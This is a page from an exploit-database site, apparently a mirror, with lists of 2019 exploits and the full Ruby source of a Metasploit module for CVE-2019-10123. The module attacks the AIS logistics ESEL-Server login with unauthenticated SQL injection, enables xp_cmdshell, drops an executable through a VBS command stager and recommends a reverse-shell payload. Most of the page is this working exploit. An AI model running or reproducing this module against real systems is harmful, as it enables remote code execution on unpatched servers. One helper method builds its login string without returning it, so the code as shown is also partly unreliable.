Menu

Improved exploit search engine. Try it out

"AIS logistics ESEL-Server - Unauth SQL Injection RCE (Metasploit)"

Author

Metasploit

Platform

windows

Release date

2019-04-30

Release Date Title Type Platform Author
2019-05-24 "Microsoft Internet Explorer Windows 10 1809 17763.316 - Scripting Engine Memory Corruption" remote windows "Simon Zuckerbraun"
2019-05-24 "Axessh 4.2 - 'Log file name' Local Stack-based Buffer Overflow" local windows "Uday Mittal"
2019-05-15 "Microsoft Windows - 'Win32k' Local Privilege Escalation" local windows ExpLife0011
2019-05-22 "Microsoft Internet Explorer 11 - Sandbox Escape" local windows SandboxEscaper
2019-05-22 "Microsoft Windows (x84) - Task Scheduler' .job' Import Arbitrary Discretionary Access Control List Write / Local Privilege Escalation" local windows SandboxEscaper
2019-05-23 "Microsoft Windows 10 1809 - 'CmKeyBodyRemapToVirtualForEnum' Arbitrary Key Enumeration Privilege Escalation" local windows "Google Security Research"
2019-05-22 "Microsoft Windows (x84/x64) - 'Error Reporting' Discretionary Access Control List / Local Privilege Escalation" local windows SandboxEscaper
2019-05-23 "Microsoft Windows 10 (17763.379) - Install DLL" local windows SandboxEscaper
2019-05-24 "Fast AVI MPEG Joiner - 'License Name' Denial of Service (PoC)" dos windows Achilles
2019-05-24 "Cyberoam General Authentication Client 2.1.2.7 - 'Server Address' Denial of Service (PoC)" dos windows "Victor Mondragón"
2019-05-24 "Cyberoam Transparent Authentication Suite 2.1.2.5 - 'NetBIOS Name' Denial of Service (PoC)" dos windows "Victor Mondragón"
2019-05-24 "Cyberoam Transparent Authentication Suite 2.1.2.5 - 'Fully Qualified Domain Name' Denial of Service (PoC)" dos windows "Victor Mondragón"
2019-05-24 "Cyberoam SSLVPN Client 1.3.1.30 - 'HTTP Proxy' Denial of Service (PoC)" dos windows "Victor Mondragón"
2019-05-24 "Cyberoam SSLVPN Client 1.3.1.30 - 'Connect To Server' Denial of Service (PoC)" dos windows "Victor Mondragón"
2019-05-23 "Terminal Services Manager 3.2.1 - Denial of Service" dos windows "Alejandra Sánchez"
2019-05-23 "NetAware 1.20 - 'Share Name' Denial of Service (PoC)" dos windows "Alejandra Sánchez"
2019-05-23 "NetAware 1.20 - 'Add Block' Denial of Service (PoC)" dos windows "Alejandra Sánchez"
2019-05-22 "TapinRadio 2.11.6 - 'Uername' Denial of Service (PoC)" dos windows "Victor Mondragón"
2019-05-22 "TapinRadio 2.11.6 - 'Address' Denial of Service (PoC)" dos windows "Victor Mondragón"
2019-05-22 "RarmaRadio 2.72.3 - 'Username' Denial of Service (PoC)" dos windows "Victor Mondragón"
2019-05-22 "RarmaRadio 2.72.3 - 'Server' Denial of Service (PoC)" dos windows "Victor Mondragón"
2019-05-22 "BlueStacks 4.80.0.1060 - Denial of Service (PoC)" dos windows "Alejandra Sánchez"
2019-05-21 "Deluge 1.3.15 - 'Webseeds' Denial of Service (PoC)" dos windows "Victor Mondragón"
2019-05-20 "Huawei eSpace 1.1.11.103 - DLL Hijacking" local windows LiquidWorm
2019-05-20 "BulletProof FTP Server 2019.0.0.50 - 'Storage-Path' Denial of Service (PoC)" dos windows "Victor Mondragón"
2019-05-20 "BulletProof FTP Server 2019.0.0.50 - 'DNS Address' Denial of Service (PoC)" dos windows "Victor Mondragón"
2019-05-20 "AbsoluteTelnet 10.16 - 'License name' Denial of Service (PoC)" dos windows "Victor Mondragón"
2019-05-20 "docPrint Pro 8.0 - Denial of Service (PoC)" dos windows "Alejandra Sánchez"
2019-05-20 "PCL Converter 2.7 - Denial of Service (PoC)" dos windows "Alejandra Sánchez"
2019-05-20 "Encrypt PDF 2.3 - Denial of Service (PoC)" dos windows "Alejandra Sánchez"
Release Date Title Type Platform Author
2019-05-23 "Shopware - createInstanceFromNamedArguments PHP Object Instantiation Remote Code Execution (Metasploit)" remote php Metasploit
2019-05-23 "Apple Mac OS X - Feedback Assistant Race Condition (Metasploit)" local macos Metasploit
2019-05-20 "GetSimpleCMS - Unauthenticated Remote Code Execution (Metasploit)" remote php Metasploit
2019-05-08 "Oracle Weblogic Server - 'AsyncResponseService' Deserialization Remote Code Execution (Metasploit)" remote multiple Metasploit
2019-05-08 "PostgreSQL 9.3 - COPY FROM PROGRAM Command Execution (Metasploit)" remote multiple Metasploit
2019-05-08 "Google Chrome 72.0.3626.119 - 'FileReader' Use-After-Free (Metasploit)" remote windows_x86 Metasploit
2019-05-02 "Ruby On Rails - DoubleTap Development Mode secret_key_base Remote Code Execution (Metasploit)" remote linux Metasploit
2019-04-30 "Pimcore < 5.71 - Unserialize RCE (Metasploit)" remote php Metasploit
2019-04-30 "AIS logistics ESEL-Server - Unauth SQL Injection RCE (Metasploit)" remote windows Metasploit
2019-04-25 "RARLAB WinRAR 5.61 - ACE Format Input Validation Remote Code Execution (Metasploit)" local windows Metasploit
2019-04-19 "Atlassian Confluence Widget Connector Macro - Velocity Template Injection (Metasploit)" remote multiple Metasploit
2019-04-19 "SystemTap 1.3 - MODPROBE_OPTIONS Privilege Escalation (Metasploit)" local linux Metasploit
2019-04-18 "LibreOffice < 6.0.7 / 6.1.3 - Macro Code Execution (Metasploit)" local multiple Metasploit
2019-04-15 "Cisco RV130W Routers - Management Interface Remote Command Execution (Metasploit)" remote hardware Metasploit
2019-04-12 "Zimbra Collaboration - Autodiscover Servlet XXE and ProxyServlet SSRF (Metasploit)" remote linux Metasploit
2019-04-12 "Microsoft Windows - Contact File Format Arbitary Code Execution (Metasploit)" local windows Metasploit
2019-04-05 "WordPress 5.0.0 - Crop-image Shell Upload (Metasploit)" remote php Metasploit
2019-04-03 "Cisco RV320 and RV325 - Unauthenticated Remote Code Execution (Metasploit)" remote hardware Metasploit
2019-03-28 "Oracle Weblogic Server Deserialization RCE - Raw Object (Metasploit)" remote multiple Metasploit
2019-03-28 "CMS Made Simple (CMSMS) Showtime2 - File Upload RCE (Metasploit)" remote php Metasploit
2019-03-19 "Jenkins 2.137 and Pipeline Groovy Plugin 2.61 - ACL Bypass and Metaprogramming RCE (Metasploit)" remote java Metasploit
2019-03-18 "BMC Patrol Agent - Privilege Escalation Code Execution Execution (Metasploit)" remote multiple Metasploit
2019-03-13 "elFinder PHP Connector < 2.1.48 - exiftran Command Injection (Metasploit)" remote php Metasploit
2019-03-07 "Drupal < 8.5.11 / < 8.6.10 - RESTful Web Services unserialize() Remote Command Execution (Metasploit)" remote php Metasploit
2019-03-07 "Imperva SecureSphere 13.x - 'PWS' Command Injection (Metasploit)" remote linux Metasploit
2019-03-07 "FreeBSD - Intel SYSRET Privilege Escalation (Metasploit)" local freebsd_x86-64 Metasploit
2019-02-22 "Nuuo Central Management - Authenticated SQL Server SQL Injection (Metasploit)" remote windows Metasploit
2019-02-20 "Belkin Wemo UPnP - Remote Code Execution (Metasploit)" remote hardware Metasploit
2019-02-11 "NUUO NVRmini - upgrade_handle.php Remote Command Execution (Metasploit)" remote php Metasploit
2019-02-11 "Adobe Flash Player - DeleteRangeTimelineOperation Type Confusion (Metasploit)" remote osx Metasploit
import requests
response = requests.get('https://www.nmmapper.com/api/exploitdetails/46782/?format=json')
                                                {"url": "https://www.nmmapper.com/api/exploitdetails/46782/?format=json", "download_file": "https://www.nmmapper.com/st/exploitdetails/46782/41206/ais-logistics-esel-server-unauth-sql-injection-rce-metasploit/download/", "exploit_id": "46782", "exploit_description": "\"AIS logistics ESEL-Server - Unauth SQL Injection RCE (Metasploit)\"", "exploit_date": "2019-04-30", "exploit_author": "Metasploit", "exploit_type": "remote", "exploit_platform": "windows", "exploit_port": null}
                                            

For full documentation follow the link above

Browse exploit DB API Browse

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::MSSQL_COMMANDS
  include Msf::Exploit::Remote::Tcp
  include Msf::Exploit::CmdStager

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'AIS logistics ESEL-Server Unauth SQL Injection RCE',
      'Description'    => %q{
        This module will execute an arbitrary payload on an "ESEL" server used by the
        AIS logistic software. The server typically listens on port 5099 without TLS.
        There could also be server listening on 5100 with TLS but the port 5099 is
        usually always open.
        The login process is vulnerable to an SQL Injection. Usually a MSSQL Server
        with the 'sa' user is in place.

        This module was verified on version 67 but it should also run on lower versions.
        An fixed version was created by AIS in September 2017. However most systems
        have not been updated.

        In regard to the payload, unless there is a closed port in the web server,
        you dont want to use any "bind" payload. You want a "reverse" payload,
        probably to your port 80 or to any other outbound port allowed on the firewall.

        Currently, one delivery method is supported

        This method takes advantage of the Command Stager subsystem. This allows using
        various techniques, such as using a TFTP server, to send the executable. By default
        the Command Stager uses 'wcsript.exe' to generate the executable on the target.

        NOTE: This module will leave a payload executable on the target system when the
        attack is finished.

      },
      'Author'         =>
        [
          'Manuel Feifel'
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          ['CVE', '2019-10123'],
        ],
      'Platform'       => 'win',
      'Arch'           => [ ARCH_X86, ARCH_X64 ],
      'Payload'        =>
        {
          'BadChars'  => "\x00\xff\x27",
        },
      'Targets'        =>
        [
          [ 'Automatic', { } ],
        ],
      'CmdStagerFlavor' => 'vbs',
      'DefaultTarget'  => 0,
      'DisclosureDate' => '2019-03-27',
      'DefaultOptions' =>
        {
          'RPORT' => 5099
        },
      ))
  end

  # This is method required for the CmdStager to work...
  def execute_command(cmd, _opts)
    cmd_xp = "EXEC master..xp_cmdshell '#{cmd}'"
    send_login_msg(create_login_msg_sql(cmd_xp))
  end

  # prepends the required length to the message and sends it to the server
  def send_login_msg(login_msg, check_response = true)
    length = login_msg.length
    length += length.to_s.length
    login_msg = "#{length}#{login_msg}"

    connect

    sock.put(login_msg)
    response = sock.recv(10000)

    if check_response
      if (response.include? 'Zugangsdaten Falsch') && (response.length > (length - 20))
        print_good('Correct response received => Data send successfully')
      else
        print_warning('Wrong response received => Probably data could not be sent successfully')
      end
    end

    return response
  ensure
    # Every time a new Connection is required
    disconnect
  end

  # embeds a sql command into the login message
  def create_login_msg_sql(sql_cmd)
    return create_login_msg("#{rand(1_000..9_999)}'; #{sql_cmd}--")
  end

  # create a plain login message
  def create_login_msg(pw)
    delim = "\xFF"
    login_str = "#{delim}000000#{delim}20180810213226#{delim}01#{delim}60"\
                "#{delim}02#{delim}1111#{delim}#{pw}#{delim}AAAAA#{delim}120"

  end

  def check
    int = rand(1..1_000)
    response_bypass = send_login_msg(create_login_msg("#{rand(1_000..9_999)}' OR #{int}=#{int}--"), false)
    if response_bypass.include? 'Zugangsdaten OK'
      CheckCode::Vulnerable
    else
      print_status("Response was: #{response_bypass}")
      CheckCode::Safe
    end
  end

  def exploit
    # enable xp cmdshell, used to execute commands later
    # Software uses the 'sa' user by default
    send_login_msg(create_login_msg_sql(mssql_xpcmdshell_enable))
    # The porotocol has no limites on max-data
    execute_cmdstager({ :linemax => 1500 })
    print_warning('The payload is left on the client in the \%TEMP\% Folder of the corresponding user.')
    print_status('Stager should now be executed.')
  end
end